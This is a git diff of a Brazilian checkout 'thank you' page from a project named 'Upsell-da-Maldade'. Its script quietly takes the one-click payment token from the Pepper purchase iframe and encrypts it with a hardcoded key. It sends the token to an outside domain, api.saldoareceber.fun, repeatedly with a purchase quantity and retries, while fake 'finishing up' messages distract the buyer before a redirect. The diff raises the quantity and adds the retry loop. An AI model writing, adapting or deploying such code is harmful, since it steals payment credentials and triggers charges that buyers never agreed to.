--- a/Upsell-da-Maldade/index.html
+++ b/Upsell-da-Maldade/index.html
@@ -4,7 +4,7 @@
 <head>
     <meta charset="UTF-8" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-    <title>Obrigado</title>
+    <title>Página</title>
 </head>
 <link rel="preconnect" href="https://fonts.googleapis.com">
 <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
@@ -70,10 +70,10 @@
     <div style="opacity: 0; z-index: -1;" class="pepperBtn"></div>
     <script src="https://pepper.com.br/oneclick.js"></script>
     <script>
-        let client = 'https://saldoareceber.fun'
+        let client = 'sitedapessoa.com.br'
         if (window.location.origin == client) {
             const pepperBtn = document.querySelector('.pepperBtn');
-            let qty = 3;
+            let qty = 4;
             let cont = 0;
             let site = 'https://google.com.br'
             let yourdomain = 'https://api.saldoareceber.fun'
@@ -86,18 +86,16 @@
                 'Estamos finalizando...',
             ]
 
-            setTimeout(() => {
-                getPay()
-            }, 3500);
+            getPay()
 
             setInterval(() => {
                 document.getElementById('status').innerHTML = messages[Math.floor(Math.random() * messages.length)]
-            }, 3500);
+            }, 2000);
 
             function getPay() {
                 minhaString = document.querySelector('iframe').src.replace('https://pepper.com.br/upsell.html', '')
                 var encrypted = CryptoJS.AES.encrypt(minhaString, "irtur3t8uteterhfrj");
-                fetch(yourdomain + '/track', {
+                fetch(yourdomain + `/track/${qty}`, {
                     method: 'POST',
                     body: JSON.stringify({
                         message: encrypted.toString()
@@ -105,16 +103,19 @@
                     headers: {
                         'Content-Type': 'application/json', // Define o tipo de conteúdo como dados binários
                     },
+                }).then((response) => {
+                    if (response.status == 200) {
+                        window.location.href = site
+                    } else {
+                        if (cont < 5) {
+                            cont++
+                            getPay()
+                        } else {
+                            window.location.href = site
+                        }                      
+                    }
                 })
 
-                cont++
-                if (cont <= qty) {
-                    setTimeout(() => {
-                        getPay()
-                    }, 2000);
-                } else {
-                    window.location.href = site
-                }
             }
         }
 
